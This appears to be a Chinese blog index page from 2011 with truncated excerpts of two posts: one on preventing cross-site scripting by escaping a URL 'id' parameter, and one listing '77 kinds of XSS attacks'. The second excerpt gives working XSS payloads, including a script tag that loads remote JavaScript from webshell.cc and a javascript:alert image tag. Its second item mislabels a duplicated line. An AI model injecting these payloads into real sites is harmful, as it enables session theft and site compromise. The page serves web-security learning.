防止跨站点脚本攻击

   
分类:技术 | 2011-12-23 | 撸过 1,264 次
0人扯蛋

逃避参数和用户输入

 

 

这是经典的XSS攻击,可以打开您的服务或Web应用程序,黑客攻击。根据设计,该网站显示用户的ID,这是作为URL参数传递。下面的脚本将采取的ID,并显示一个值得欢迎的的消息。

 

<script type="text/javascript">

 

var start = window.location.href.indexOf("id");

 

var stop = window.location.href.length;

 

var id = "guest";

&nb[......]

继续阅读

77种XSS跨站脚本攻击

   
分类:安全 | 2011-08-14 | 撸过 2,074 次
0人扯蛋

1)普通的XSS JavaScript注入
<script type="text/javascript" src="http://webshell.cc/XSS/xss.js"></script>

(2)IMG标签XSS使用JavaScript命令
<script type="text/javascript" src="http://webshell.cc/XSS/xss.js"></script>

(3)IMG标签无分号无引号
<img src="javascript:alert(‘XSS’)" alt="" />

(4)IM[......]

继续阅读